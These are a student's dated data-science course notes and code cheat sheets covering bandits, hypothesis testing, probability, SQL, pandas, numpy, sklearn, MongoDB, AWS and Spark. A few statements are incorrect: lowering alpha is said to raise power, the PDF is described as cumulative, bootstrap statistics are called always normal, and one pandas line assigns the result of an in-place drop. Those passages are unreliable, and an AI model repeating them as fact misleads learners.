Confidence Bound UCB1\n Choose which ever bandit has the largest value, zero regret algorithm\n 3. Softmax\n - choose a bandit randomly in proportion to its estimated valu. Tau is a parameter that controls the randomness of the choice\n - pA is the percentage of people who convert on site A\n 4. Bayesian Bandit\n - Modeling each of the bandits with a beta distribution with the shape parameters of alpha = won, beta = lost\n - Then take a random sample from each bandit's distribution and choose the bandit with the highest value. Update with each new trial\n\n\n\n\n\n\n\n\n\n\n160609\nStatistical Power\n\n 1. power\n 1. Def: Probability of rejecting the null hypothesis given that the alternative hypothesis is True\n 2. How to improve power?\n - One way to improve the power of the test is to increase sample size, so the distribution under the presumed alternative hypothesis has less variation and thus the area to the right of the dotted line (alpha) is higher.\n - Less variable data\n - Change alpha (lower it)\n - A larger effect size (that you want to be able to detect with your experiment) would also increase the power of the test. Though experimentally a larger effect size is harder to achieve, ie it requires a higher burden of proof\n\n\n160608\nHypothesis Testing\n\n 1. Bootstrap: As long as your original sample is REPRESENTATIVE of the population, because the number of permutations of combinations of subsequent combinations (Drawn with replacement) of the samples in your bootstrap (n to the n, if n = size of original sample) is so large, the summary statistics of random variables will follow normal distribution.\n A. So you can use bootstrapping to empirically estimate confidence intervals for the summary statistic from your bootstrap sample\n B. So bootstrapping does not always narrow the confidence interval of the summary statistic, it can provide a confidence interval for statistics that don't have CLT to provide a 95CI. \n 1. ie \" it is available regardless of how complicated the estimator is\". 
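Quick numpy sketch of the bootstrap confidence-interval idea above (my own illustration): resample with replacement many times and take percentiles of the bootstrapped statistic.

```python
import numpy as np

def bootstrap_ci(sample, stat_func=np.median, n_boot=10000, ci=95, seed=0):
    """Empirical CI for any statistic -- no closed-form standard error needed."""
    rng = np.random.RandomState(seed)
    n = len(sample)
    boot_stats = np.array([stat_func(rng.choice(sample, size=n, replace=True))
                           for _ in range(n_boot)])
    lo, hi = np.percentile(boot_stats, [(100 - ci) / 2.0, 100 - (100 - ci) / 2.0])
    return lo, hi

data = np.random.exponential(scale=2.0, size=100)   # skewed data, awkward for a CLT-based CI of the median
print(bootstrap_ci(data))
```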
Since bootstrapping \"estimates the sampling distribution of an estimator by sampling with replacement from the original sample\"\n 2. Used to estimate the standard errors and confidence intervals of an unknown population parameter\n 2. Hypothesis Testing\n 1. Type 2 error, loss of opportunity error, fail to reject H0 when it is false\n 3. Chi square\n 1. Chi Square Goodness of Fit: Used to compare the sample data of a categorical variable to the theoretical distribution. Observed minus expected\n 2. Chi Square Test of Independence: Compare two categorical variables under the assumption that they are independent \n\n\n\n160607\nSampling and Estimation\n\n 1. Parametric vs Non Parametric\n A. Parametric based on assmptions about the distribution of the underlying population, that that there are parameters that define that distribution\n - If data deviates from these assumptions than a parametric procedure can lead to incorrect conclusions\n B. Nonparametric: does not make distributional assumptions about he shape or parameters of the underlying distribution\n - If base assumptions hold, parametric approaches can lead to more precise estimations\n - Usually based on ranking, does not take into account distribution of data\n - Less power than corresponding parametric procedure\n - Interpretation can be more difficult than parametric measure\n 2. Maximum Likelihood Estimators\n A. The join distribution is the product of the individual probabilty distributions, this is ASSUMING that events are indepdent and identically distributed (IID)\n - Maximizing the likelihood function is the same as maximizing the log lilelihood function which simplifies complications, since the product of function is the same as the sum of the logs of the function. So calculation is simplified.\n - So derivative with respect to the parameter (partial derivative) is how you solve for this\n 3. Maximum a Posteriori -MAP\n A. Baysean suggests that the parameters from come a distribution themselves. Assume a prior distribution of the parameters g over theta, given the value x.\n 4. Kernal Density estimations\n A. Drawn from a distribution with an unknown density f, but which you are interested in estimating the shape of its function. Essentially a data smoothing problem.\n B. Uses a kernel K(.): which is a nonnegative function that integrates to one and has a mean of zero\n c. h is a smoothing parameter, called a bandwidth, which determines the width of the bins over which the kernel is deployed.\n D. Related to histograms, but can be made smooth by using a suitable kernel. Sum of kernals, can be thought of as summing kernels\n\n\n\n\n160606\nProbability\n- Probability Mass Function PMF: For a DISCRETE random variables X that takes discrete values, give the probability of an individual event.\n- Probability Density Function PDF (\"CDF\" in scipy stats modules): For CONTINUOUS random variables, gives probability of having value less/greater than a given value.\n\n- disjoin is mutually exclusive\n- upside down A is “all\"\n- Combinatorics\n - Factorial is the all the possible orderings in a set of items n\n - Permutations, selecting subgroups of a set when order matters\n - nPk = n! / (n - k)!\n - Combination: number of was of selecting subgroups when order doesn’t matter\n - nCk = n! 
/ ((n-k)! k!)\n - Note that you’re dividing out the number of orderings (k factorial) of the k items chosen\n - Sample space contains the exhaustive list of mutually exclusive simple events\n - An event A contains a subset of the simple events in S\n - Conditional Probability: probability given something already occurred. Reduces the sample space to what is given (what already happened)\n- Random Variable\n - Expected Value: the probability-weighted average (long-run mean) of a random variable, not necessarily its most likely value\n - For a discrete random variable, sum over the sample space; for continuous, integrate over the sample space\n - Variance: measure of the spread of values around the mean; squaring the deviations is one way (of several) to make them positive, but the units are squared, which makes it harder to interpret\n - Standard deviation is the square root of Variance, with units back on the original variable's scale\n - Covariance: how two variables vary in relation to each other. Ranges from negative to positive infinity. The re-scaled covariance (correlation) ranges from -1 to 1.\n\n- DISCRETE DISTRIBUTIONS\n- Bernoulli distribution: two outcomes, success/failure\n - Constant probability of success, events are independent\n- Binomial models the sum of Bernoulli random variables; so the number of successes in n trials\n - probability is the product of the independent Bernoulli random variables, since each is independent\n- Geometric distribution also builds on Bernoulli, models the number of trials to first success\n- Poisson models the number of events/successes in a period of time (or space)\n - lambda is the average rate of success in that time or space\n - Good for counting processes\n\n- CONTINUOUS DISTRIBUTIONS\n- Uniform: equally likely events within a set interval\n- Exponential: models time between Poisson events\n\n160603\nSQL Python\n\n- psycopg2 library to interface to a Postgres database from within Python\n - There are Python libraries to connect to almost any database you want: mysql-connector-python, sqlite, pymongo\n- Cursor is a control structure to fetch data and handle transactions with the SQL database\n - The results from a cursor object can only be accessed once, since it is returned as a generator. So need to dump it into a data structure in Python you can use later\n - Generally will use cur.fetchall() into a python object to use the results of your query\n - Can also use: cur.fetchone() #next result, cur.fetchmany(n) #returns next n results (in case you need to batch the storage of your results)\n - Or: for res in cur: #iterates over results in the cursor\n- Enter a SQL Postgres query as a multiline string in python: query = ''' ... '''\n\n- If you execute a query in psycopg2 and there is a mistake in your query, you can’t interact with the cursor again (ie send a fixed query) until you rollback the connection: conn.rollback()\n- To open a connection in psycopg2:\n - import psycopg2\n - conn = psycopg2.connect(dbname='[dbname]', user='[username]', host='[hostname]')\n- Write queries in python using: cur.execute(''' SQL QUERY ''')\n- Changes to the database made using your query are NOT stored until you commit them using\n - conn.commit()\n - cur.close()\n - conn.close() #good practice to close the connection at the end of your python program\n- conn.rollback() # if you make a mistake on the query, use rollback to restart the transaction.\n- To create a new DATABASE in python through psycopg2, you need to turn on auto-commit in order to execute the command.
Be sure to close the connection and restart a new one with auto-commit off, so you don’t accidentally change the database with a subsequent query that you can’t roll back.\n - conn.set_session(autocommit = True )\n - cur = conn.cursor()\n - cur.execute(‘CREATE DATABASE <database name>’)\n - curr.close()\n - conn.close()\n- COPY <into table name> FROM ‘filepath of data file ie csv’ DELIMITER ‘,’ CSV; #import data into table from external file.\n\n160602\nSQL\n\n- RDBMS data is one way to store persistent data\n - Data that is infrequently accessed and unlikely to be changed\n - Composed of tables, columns rows\n - Column contains a certain data type\n - Row is an observation that holds values for each of the columns\n - Tables are specified by a schema that defines the structure of the data\n- Advanced SQL\n - Self-join-effectively joining a table with itself, in order to filter more powerfully. Used commonly.\n - A With function in SQL, you can alias a query, then use than in a larger query\n - Window functions is signified OVER ( PARTITION BY ) , and allows a calculation over a set of table row within a query\n\n160601\nObject Oriented Programming\n\n- A class is a blueprint of an object that can be created from that class, works generically across different cases. Ie a dictionary is a class in python\n- An object is an instance of a class, can create multiple instances of the same class\n- An attribute is a property of the class, usually a variable\n- OO revolves around three concepts\n - Encapsulation - interact with internals of an object only through method calls, rather than directly\n - attributes of the object are essentially the data stored in the object (instance of the class), but only alter/update them through methods\n - Inheritance - Derive a child class from a base class. Base class defines general behavior. Child class specializes behavior.\n - Polymorphism - Objects of the same base class will often support the same interface, having the same/similar attributes or methods\n- “self” refers to an instance’s own unique data. When you assign a class to a variable, that variable subsequently then gets passed to every method of that class-instance as the first argument. So every method in that class must have a “self” argument in the list\n- __init__ is the first method called in a class that is called whenever the class is created. Use self to refer to the instance’s member data and functions\n- *args will pass a list sequentially to a function\n- ** kwargs are keyword-named arguments that are stored in a dictionary and can be passed to a function, either as a dictionary or as individual named key-word arguments. preceeded by ** (packing and unpacking)\n- A static method is a function in a class that is not passed the reference the instance of the class. So it’ll just do that it says, regardless of the rest of the class functions\n- Magic methods: predefined methods within python that can be defined for your class, such as length or str(stringmethod)\n - repr is the python representation of the object\n - str is the string representation of the object\n - init is the constructor magic method required to initialize a class\n- An Abstract Base Class defines a standard interface for derived object. So it allows you to define a common set of methods for a class-type, essentially enforcing polymorphism\n - Ie for any regression, they offer a certain types of methods. 
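Minimal sketch of the Abstract Base Class pattern described above (my own example, not lecture code; written in the Python 2 style the notes use, with a comment on the Python 3 equivalent):

```python
from abc import ABCMeta, abstractmethod


class BaseRegression(object):
    """Defines the common interface every concrete model must implement."""
    __metaclass__ = ABCMeta          # Python 2 style; in Python 3, subclass abc.ABC instead

    @abstractmethod
    def fit(self, X, y):
        pass

    @abstractmethod
    def predict(self, X):
        pass


class MeanRegression(BaseRegression):
    """Trivial concrete child: always predicts the training mean."""
    def fit(self, X, y):
        self.mean_ = sum(y) / float(len(y))
        return self

    def predict(self, X):
        return [self.mean_] * len(X)


model = MeanRegression().fit([[1], [2], [3]], [1.0, 2.0, 3.0])
print(model.predict([[4], [5]]))     # [2.0, 2.0]
```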
So define the ABC first, then derive the individual classes from it later\n- Decorators: functions which wrap other functions\n- The Python Debugger (pdb) is a good way to debug code\n - insert the trace line in the code where you want execution to pause:\n - import pdb; pdb.set_trace()\n - type n for the next line, c to continue to the next breakpoint, q to quit, s to step into function calls line by line\n - can access anything at that python runtime, paused at the given line\n\n160531\n\n- Programming\n - Generators in Python\n - Take less memory\n - Use enumerate when you need the index of the list as well as the value\n - If possible, try to see if you can use hashing (dicts/sets) to organize/loop over data, as this is the fastest way to perform such lookups\n - Mutable objects can change their value but keep their id()\n - lists, sets, dictionaries\n - Only immutable (hashable) objects can be used as dictionary keys; mutable objects are “unhashable”\n - Immutables: int, float, string, tuple
#status of local git with cloud git\n git add . #add all thing in current directory and subdirectory\n git commit -m “comment\"\n git push\n git init #initializes directory as git repo on your local computer\n echo \"# galnotes\" >> README.md\n git init\n git add README.md\n git commit -m \"first commit\"\n git remote add origin https://github.com/geoffisdancing/galnotes.git\n git push -u origin master\n git branch # tells the git branch status of your current working directory\n git checkout master #switch to master branch from other branch, ie if you want to make a \"hotfix\" to master\n git merge hotfix #merge hotfix branch changes with master (ie master is your current branch location since you just checked it out)\n git branch -d <hotfixbranch> #can delete branch once you've merged it with master\n\n git pull origin master # syncs your local git repo with the origin (on http) pulling down new files\n git pull #also works, don’t necessarily need “origin master\"\n\n #to push files from local repo (recently just committed to one account) to a different git account:\n git remote -v #to get URL\n git remote add <temp name> <change to your git url>\n git push <temp name>\n\n # to fetch a specific file from a remote git URL\n git fetch {remote host url} #pulls branch information from the remote github host (ie from another computer), after which you can now do git checkout branch which may be from another computer/user\n git branch -a #after fetch, will show the other branches from master, from which you can then checkout one you want\n git checkout FETCH_HEAD -- '[filename]' # both of these above commands used in order to pull an individual file from a the remote master. Must use dir/filename if file is located in a subdirectory\n\n\n\n#PANDAS\n#axis = 1 indicates column in pandas\n\n%matplotlib inline # command in ipython to print graphs inline\nimport matplotlib.pyplot as plt #plotting functionality plt\n\npd.read_csv('filepath') # to read csv file into dataframe, assign to df name.\n# try date_parser=[col index] parameter to allow specification of a specific column to parse as a datetime.\npd.read_table('text_filepath') #read text file as df\npd.scatter_matrix(<dfname>, alpha = 0.2, figsize=(6,6),diagonal='kde'); #scatter matrix of dataframe variables in pandas\n\ndf = df.drop('column name', axis=1, inplace=True) # drops column in pandas dataframe, axis = 1 indicates column in pandas. default is axis = 0 which drops an observation (row) from the data\ndf.drop(df.index[[1,2,3]]) #drop rows of df, indices 1,2,3\ndf.pop('column name') #pops off column name from df, modifying df in place\ndf = df[df['Column name'] <some value] # index based on column value, syntax here effectively deleting by re-saving as df\ndf[['column 1', 'column 2']] #index multiple columns\ndf2 = df.rename(columns={'int_col' : 'some_other_name'}, inplace= True) #renamecolumns\ndf.info() # type of each column in df\ndf.hist('column name') #plots histogram over column (or all columns if left blank)\n<dateseries>.dt.month #to get month (or other element) from pandas datatime object\n#when grouping by in pandas, can add \"as_index = False\" to move index to top.\nseries.unique() # to pull unique values of a given series\ndf.unstack() #will switch from stacked (row-wise data) to column-wise data by the inner-most grouping index.\ndf.values #return an np.ndarray of either the dataframe or the dataframe index\n#if result of slicing is a 1D dataframe, this will be a (vertical) pd.Series, which can't be used to index. 
So .values will turn into a 1D array, which can be used to index.\ndf.values.astype(float) # returns values of a df as float\ndf.astype(float) #suffix astype allows conversion to float.\ndf.columns.values #returns an array of the column names of df\n\nimport statsmodels.api as sm # to import statsmodels package for regression capability\nsm.regression.linear_model.OLS(dependent_array, independent_dataframe).fit() #this should be assigned to an <object> and then can be displayed using:\nprint <object>.summary()\nplt.scatter( credit_OLS.predict(), credit_OLS.outlier_test()['student_resid']) #plot student residuals vs fitted y's to look for outliers\nsm.qqplot(<OLS_model_object>.resid) #plot QQ plot of residuals of previously fitted statsmodels object name. \npd.get_dummies(array) #create dummy variables\npd.set_index('column_name', inplace=True) #set column as index\npd.groupby(by=None, axis=0) #group df by first argument\ndf.iloc[<integerindex>] #allows indexing by index location in pandas dataframe\n\ndf.to_csv('filename', index=False) #write to csv\ndf.reset_index(inplace=True) #pulls index into the first column.\ndt.datetime.strptime(ginger.date[0], '%d%b%y:%H:%M:%S') #strip time data from string, requires specific flags, at the bottom of this site: https://docs.python.org/2/library/datetime.html\n#can also use after reading csv, example: ginger['date']=pd.to_datetime(ginger['date'], format='%d%b%y:%H:%M:%S')\ndf['column']=df.apply(lambda row: f(row), axis=1) #f = function to apply across each row of\ndf.column.value_counts() #value counts for a given column (similar to tabulate)\ndf[df['column'].isin([list of values])] #how to filter dataframe rows by \"within/in\"\ndf.columns=[<list of names as strings>] #to rename columns\ndf.replace(to_replace=None, value=None, inplace=True) #replace one value with another in df\ndf.fillna(value=None, axis=None, inplace=False) #fill NaN values in df\ndf.drop_duplicates(subset=None, keep='first/last', inplace=False) #drop duplicates, can specify a subset of columns to look over\n\n%who_ls DataFrame #lists dataframes in the current workspace/memory\n\n\n# Numpy\n\nnp.linalg.norm() # get the norm (magnitude) of a vector\nnp.logical_and(array1==True, array2==True) #returns boolean array corresponding to array1/2 satisfying the conditions described\narrr[(arrr[:,0]>0.6) & (arrr[:,1]<0.4)] #setting slices of an array to conditions will return an array which meets those conditions OR\nnp.array(thresholds)[(np.array(tpr)>0.6) & (np.array(fpr)<0.4)] #can even index a target array (thresholds) according to boolean statements for TWO OTHER arrays (tpr, fpr) which are the same size/shape as the target array (assuming of course that they reference the same data points)\nnp.argsort(array) #returns an array with the indices of the sorted input array, which you can use to iterate over sorted values. \narr[np.random.randint(0, size)] #np.random.randint returns a random integer which in this case is used to index the array randomly, with replacement.
size = len(arr)\narr.tolist() #return array values as list\narr = np.array(arr) # turn a list or other object into a np array\narr.shape #returns a tuple describing the shape of the array in (rows, columns)\nnp.newaxis '''usage'''#if arr is a 1D array (ie arr.shape = (3,)), arr[np.newaxis,:] will return a row vector shaped (1,3) whereas arr[:,np.newaxis] will return a column vector shaped (3,1)\narr[np.min(array, axis = 1)>0] #np.min returns booleans for the condition >0 along rows (axis = 1)\narr = np.append(arr, item) #append item to an array. Can even initialize array without specifying shape as:\narr = np.array([]) #initialize empty array\nnp.linspace(start,stop,num=50) #create a var from start to stop with num points.\nbalance['Married'] = balance['Married'].map({'Yes': 1, 'No': 0}) #mapping to change responses from Yes to 1.\nnp.logical_not(<condition>) #allows you to exclude things in <condition> without an if statement.\nX[np.where(mask)] #turns boolean mask into array of indices\nnp.tile(X,reps) #repeat X, reps times\nnp.ravel(a) #return a contiguous flattened array from a, which can be a dataframe\n\n\n# Sklearn\nfrom sklearn.cross_validation import train_test_split\nX_train, X_test, Y_train, Y_test = \\\ntrain_test_split(features, target, test_size=0.3) # to make test/training set for cross validation\n\n\nfrom sklearn.linear_model import LinearRegression\nlinear = LinearRegression() #instantiate the LinearRegression class\nlinear.fit(train_feature, train_target) #fit linear regression model using the object linear which is an instantiation of the LinearRegression class\n\nfrom sklearn.linear_model import LogisticRegression\nanyname = LogisticRegression()\nanyname.fit(x[['col1','col2']],y) #fit logistic regression model, using col1,2,i number of features of x\n\nfrom sklearn.cross_validation import KFold\nkf = KFold(len(array), n_folds = 5) #create Kfold indices for cross validation on array use as follows:\nfor train, test in kf: model.fit(X[train], y[train]) #usage for Kfolds cross validation\n\nfrom sklearn.preprocessing import StandardScaler\nscale = StandardScaler()\nscale.fit(training_data) #scale data\n\nfrom sklearn.grid_search import GridSearchCV #example code of how to use grid search\nfrom sklearn.ensemble import GradientBoostingRegressor\nparam_grid = {'learning_rate':[0.1,0.05,0.02], 'max_depth':[4,6], 'min_samples_leaf':[3,5,9,17]}\nest = GradientBoostingRegressor()\ngs_cv = GridSearchCV(est, param_grid).fit(X,y) #grid-search takes (essentially) a raw or minimally parameterized estimator Class, and performs a search across the parameter_grid for the best parameter by the given scoring method. Will automatically assign the best parameters to the gs_cv estimator object once complete.\ngs_cv.best_params_\nfrom sklearn.grid_search import RandomizedSearchCV #perform a random grid search, allows searching through a random set of the hyperparameters to get a sense of where to pick them, thus will run faster than GridSearch.\n\nfrom sklearn.cross_validation import cross_val_score\ncross_val_score(estimator_object, X, y=None, scoring = <scoring type>, cv=None) #obtains an accuracy score by cross validation. Takes a parameterized estimator object, but this object does not need to be fitted to training data, as this will take training data (x and y if available) and perform cross validation (train test, train test K-fold times) to obtain a cross-validated score.
You can set the type of score using scoring = <scoring type, below>, default scoring type is the simples appropriate score for the method, such as accuracy for classifiers or R2 for regressors; y lets you set labels for supervised learning, cv defaults to 3 fold CV, can set other integer\ntypes of scores: http://scikit-learn.org/stable/modules/model_evaluation.html\n\n\n# Matplotlib\n\nplt.legend() #to have plot labels show as legend\nplt.axvline(x=0.4) #plot vertical line\nplt.axhline(y=0.6) #plot horizontal line\ndf.hist()\nplt.figure(figsize=(10,10)) #sets the figsize in matplotlib and Seaborn for the given session\nplt.savefig('example.png', dpi=300) #save figure\n#line plots\nplt.plot(x, y, marker='o', alpha=0.4, color='red')\nplt.plot(x, y2, marker='o', alpha=0.4, color='green')\n#scatter plots\nplt.scatter(x, y, edgecolor='none', s=size)\n#bar plots\nplt.bar(people_index, score, bar_width, align='center')\nplt.xticks(people_index, people)\n#histogram\n import scipy.stats as scs\n # Get a list of normally distributed values\n values = scs.norm.rvs(size=1000)\n # Plot the first histogram\n plt.hist(values, color='r', alpha=.4)\n plt.show()\n # Plot the second histogram with probability density\n plt.hist(values, color='r', alpha=.4, normed=1)\n plt.show()\n#Box plots\n import scipy.stats as scs\n one = scs.norm(3, 5).rvs(size=1000)\n two = scs.norm(5, 1).rvs(size=1000)\n data = [one, two]\n plt.boxplot(data)\n plt.xticks([1, 2], ['a', 'b'])\n plt.show()\n\n# Label axis/legend/Figure size\n fig = plt.figure(figsize=(10, 4)) # 10 wide and 4 height\n x = [1, 2, 3, 4]\n y = [2, 3, 4, 5]\n plt.plot(x, y, label='Legend 1')\n plt.xlabel('X Axis', fontsize=14, fontweight='bold')\n plt.ylabel('Y Axis', fontsize=14, fontweight='bold')\n plt.title('Title', fontsize=20, fontweight='bold')\n plt.legend(loc='upper left')\n\n#Sub plots\n x = [1, 2, 3, 4]\n y = [2, 3, 4, 5]\n \n # subplot() command specifies numrows, numcols, fignum where fignum ranges from 1 to numrows*numcols\n # Define the rows and columns of subplots (2x2). 
Can specify the figsize too\n fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, figsize=(12,7))\n\n ax1.plot(x, y, label='first plot')\n ax1.legend(loc='upper left')\n ax1.set_xlabel('X label')\n ax1.set_ylabel('Y label')\n ax1.set_title('Title')\n #OR\n ax[0][0].plot(x, y, label='first plot')\n ax[0][0].legend(loc='upper left')\n ax[0][0].set_xlabel('X label')\n ax[0][0].set_ylabel('Y label')\n ax[0][0].set_title('Title')\n\n # Plot 1 line on the upper right\n ax2.plot(x, y, label='second plot', color='r')\n ax2.legend(loc='upper left')\n\n # Plot 1 line on the lower left\n ax3.plot(x, y, label='third plot', color='g')\n ax3.legend(loc='upper left')\n\n # Plot 1 line on the lower right\n ax4.plot(x, y, label='fourth plot', color='c')\n ax4.legend(loc='upper left')\n\n # Can set an overall title in the middle of the figure\n plt.suptitle('Overall title', fontsize=16)\n\n\n#plotting several sub-plots\ndef fig(digits):\n fig, _ = pl.subplots(nrows=10, ncols=10, figsize=(12,12))\n for i,ax in enumerate(fig.axes):\n ax.imshow(digits.images[i])\n ax.axis('off')\n plt.show()\n\n\n# Seaborn\nplotter = df.drop(['date_formatted','user_id','date','id_number','steps_list'],axis=1)\nsns.pairplot(plotter.iloc[:,0:5]) #creates pairwise scatter plots\n\n\n\n# NLTK for Natural Language Processing\nnltk.download('stopwords') #downloads stopwords for nltk\n\nfrom nltk.stem.porter import PorterStemmer\nfrom nltk.stem.snowball import SnowballStemmer\nfrom nltk.stem.wordnet import WordNetLemmatizer\n\nporter = PorterStemmer()\nsnowball = SnowballStemmer('english')\nwordnet = WordNetLemmatizer()\n\n\n# PyMongo\nfrom pymongo import MongoClient\nclient = MongoClient()\n# Access/Initiate Database\ndb = client['test_database']\n# Access/Initiate Table\ntab = db['test_table']\n\nfrom bs4 import BeautifulSoup #import html parser BeautifulSoup\nsoup = BeautifulSoup(shoes, 'html.parser') #instantiate BeautifulSoup parser\nimg_array = soup.select('img.img') #select CSS elements \"img.img\" from html using BS\n\n\n# MongoDB\nUsing Mongo - General Commands for Inspecting Mongo\n help // List top level mongo commands\n db.help() // List database level mongo commands\n db.<collection name>.help() // List collection level mongo commands.\n show dbs // Get list of databases on your system\n use <database name> // Change the database that you're current using\n show collections // Get list of collections within the database that you're currently using\n\nInserting\n Once you're using a database you refer to it with the name db. 
Collections within databases are accessible through dot notation.\n\ndb.users.insert({ name: 'Jon', age: '45', friends: [ 'Henry', 'Ashley']})\ndb.getCollectionNames() // Another way to get the names of collections in current database\n\ndb.users.insert({ name: 'Ashley', age: '37', friends: [ 'Jon', 'Henry']})\ndb.users.insert({ name: 'Frank', age: '17', friends: [ 'Billy'], car : 'Civic'})\n\ndb.users.find()\n { \"_id\" : ObjectId(\"573a39\"), \"name\" : \"Jon\", \"age\" : \"45\", \"friends\" : [ \"Henry\", \"Ashley\" ] }\n { \"_id\" : ObjectId(\"573a3a\"), \"name\" : \"Ashley\", \"age\" : \"37\", \"friends\" : [ \"Jon\", \"Henry\" ] }\n { \"_id\" : ObjectId(\"573a3b\"), \"name\" : \"Frank\", \"age\" : \"17\", \"friends\" : [ \"Billy\" ], \"car\" : \"Civic\" }\n\nQuerying\ndb.users.find({ name: 'Jon'}) // find by single field\ndb.users.find({ car: { $exists : true } }) // find by presence of field\ndb.users.find({ friends: 'Henry' }) // find by value in array\ndb.users.find({}, { name: true }) // field selection (only return name)\ndb.users.findOne() #helpful to find one record so u can see structure\n\nUpdating\ndb.users.update({name: \"Jon\"}, { $set: {friends: [\"Phil\"]}}) // replaces friends array\ndb.users.update({name: \"Jon\"}, { $push: {friends: \"Susie\"}}) // adds to friends array\ndb.users.update({name: \"Stevie\"}, { $push: {friends: \"Nicks\"}}, true) // upsert\ndb.users.update({}, { $set: { activated : false } }, false, true) // multiple updates\n\nImports and Cursors\n To import existing data into a mongo database one uses mongoimport at the command line. In this way mongo will accept a number of data types: JSON, CSV, and TSV.\nmongoimport --db tweets --collection coffee --file coffee-tweets.json\n Now that we have some larger data we can see that returns from queries are not always so small.\n use tweets\ndb.coffee.find()\n When the return from a query will display up to the first 20 documents, after that you will need to type it to get more. The cursor that it returns is actually an object that has many methods implemented on it and supports the command it to iterate through more return items.\ndb.coffee.find().count() // 122\ndb.coffee.find().limit(2) // Only two documents\ndb.coffee.find().sort({ 'user.followers_count' : -1}).limit(3) // Top three users by followers count\n\nIteration\n MongoDB also has a flexible shell/driver. This allows you take some action based on a query or update documents. You can use an iterator on the cursor to go document by document. In the Javascript shell we can do this with Javascript's forEach. forEach is similar to Python's iteration with the for loop; however, Javascript actually has a more functional approach to this type of iteration and requires that you pass a callback, a function, similar to map and reduce.\ndb.coffee.find().forEach(function(doc) {\n doc.entities.urls.forEach(function(url) {\n db.urls.update({ 'url': url }, { $push: { 'user': doc.user } }, true)\n });\n});\n\nAggregation\n Aggregations in Mongo end up being way less pretty than in SQL/Pandas. Let's just bite the bullet and take a look:\ndb.coffee.aggregate( [ { $group :\n {\n _id: \"$filter_level\",\n count: { $sum: 1 }\n }\n}])\n Here we are first declaring that we're going to do some sort of grouping operation. Then, as Mongo desires everything to have an _id field, we specify that the _id is going to be the filter level. And then we're going to perform a sum over each level counting 1 for each observation. 
This information is going to be stored in a field called count. What do we get back?\n We can also do more complicated stuff as well. Here's a query that returns the average number of friends users in this dataset by country. We need to access the country code field of the place field, but that is easy with an object oriented language like JS.\ndb.coffee.aggregate( [ { $group :\n {\n _id: \"$place.country_code\",\n averageFriendCount: { $max: \"$user.friends_count\" }\n }\n}])\n\n\n\n# Boto for interaction with Amazon Web Services\nimport boto\n\n# setting up aws access keys using json\nwith open('/Users/sf321092/aws.json') as f:\n data = json.load(f)\n access_key = data['access-key']\n secret_access_key = data['secret-access-key']\n\n#open boto connection\nconn = boto.connect_s3(access_key, secret_access_key)\n\n#upload histogram to AWS S3\nbucket = conn.get_bucket('testing-geoff')\n#create a new key, which is akin to a new file in the bucket\nfile_object = bucket.new_key('geofffig.png')\n#set key contents from filename in local path\nfile_object.set_contents_from_filename('/Users/sf321092/ds/gal/daily/high-performance-python/geofffig.png')\n\n# command line code to log onto amazon instance from terminal, turns terminal into a terminal on the remote EC2 instance using ssh\nssh -X -i /Users/sf321092/.ssh/galkey.pem [email protected]\n\n# Command line code to write files to EC2 instance using scp\nscp -i /Users/sf321092/.ssh/galkey.pem /Users/sf321092/ds/gal/daily/high-performance-python/geoff_script.py ubuntu@e<public instance id>:~\n\n\n# SPARK! Distributed Data Management\nimport pyspark\nsc = ps.SparkContext('local[4]') #initiating spark context locally using 4 cores\nsc.parallelize(lst) #creates an RDD for local list lst\nsc.textFile('sales.txt') #I believe this creates an RDD from a text file\n .map(function) and .filter() # are functions you call on the sc object that perform transformations to create new RDDs from existing RDDs.\n .count() # is an action and brings the data from the RDDs back to the driver.\n .first() #an action that returns the first entry in the RDD\n .take(2) #an action that returns the first two entries in the RDD as a list\n .collect() #an action that pulls all entries in the RDD, requiring the entire RDD to fit into memory \n\n#word count example using Spark\nsc.textFile('input.txt')\\\n .flatMap(lambda line: line.split())\\\n .map(lambda word: (word, 1))\\\n .reduceByKey(lambda count1, count2: count1 + count2)\\\n .collect()\n\n # Example Spark Commands\n Expression\tMeaning\n filter(lambda x: x % 2 == 0)\tDiscard non-even elements\n map(lambda x: x * 2)\tMultiply each RDD element by 2\n map(lambda x: x.split())\tSplit each string into words\n flatMap(lambda x: x.split())\tSplit each string into words and flatten sequence\n sample(withReplacement = True, 0.25)\tCreate sample of 25% of elements with replacement\n union(rdd)\tAppend rdd to existing RDD\n distinct()\tRemove duplicates in RDD\n sortBy(lambda x: x, ascending = False)\tSort elements in descending order\n\n Common Actions\n Expression\tMeaning\n collect()\tConvert RDD to in-memory list\n take(3)\tFirst 3 elements of RDD\n top(3)\tTop 3 elements of RDD\n takeSample(withReplacement = True, 3)\tCreate sample of 3 elements with replacement\n sum()\tFind element sum (assumes numeric elements)\n mean()\tFind element mean (assumes numeric elements)\n stdev()\tFind element deviation (assumes numeric elements)\n\njson.loads()\njson.dumps() #use in mappnig functions to change items in RDD to json. 
read documentation\n\n# Spark Hive commands (to work with Hive data frames in Spark)\nhive_cxt = HiveContext(sc)\ndf = hive_cxt.createDataFrame(iris_pandas_df) #create df in a hive context\ndf.printSchema()\ndf.filter(df['petal_length'] > 2).rdd.map(tuple).collect() #filter using Hive\ndf.registerTempTable('iris')\nhive_cxt.sql('''SELECT * from iris\n WHERE petal_length > 2''').head(5) #SQL Hive query using Spark\n\n\n\n#Spark local UI is at localhost:8080\n\n#create local master node, run from inside master tmux session initiated by first command\ntmux new -s master #first command\n${SPARK_HOME}/bin/spark-class org.apache.spark.deploy.master.Master \\\n-h 127.0.0.1 \\\n-p 7077 \\\n--webui-port 8080\n\n#create local worker node, run from inside worker tmux session initiated by first command\ntmux new -s worker1\n${SPARK_HOME}/bin/spark-class org.apache.spark.deploy.worker.Worker \\\n-c 1 \\\n-m 1G \\\nspark://127.0.0.1:7077\n\n#start ipython notebook to interact with LOCAL spark cluster\nIPYTHON_OPTS=\"notebook\" ${SPARK_HOME}/bin/pyspark \\\n--master spark://127.0.0.1:7077 \\\n--executor-memory 1G \\\n--driver-memory 1G\n\n\n\n#Tmux, run commands in terminal\nbrew install tmux # Install tmux with homebrew\ntmux new -s [session_name] # Start a new tmux session\nctrl + b, d # Detach from that tmux session\nctrl + b, % # start a new pane in a window, horizontal\nctrl + b, double quote # start a new vertical split pain in window \nctrl + b, o # switches between various panes\ntmux ls # Get a list of your currently running tmux sessions\ntmux attach -t [session_name] # Attach to an existing session (can use a instead of attach)\ntmux kill-session -t myname #kill session\ntmux ls | grep : | cut -d. -f1 | awk '{print substr($1, 0, length($1)-1)}' | xargs kill #kill all tmux sessions\n\n\n\n\n#Spark AWS\nmv Dowloads/<pemname>.pen .ssh/ #move file from folder to 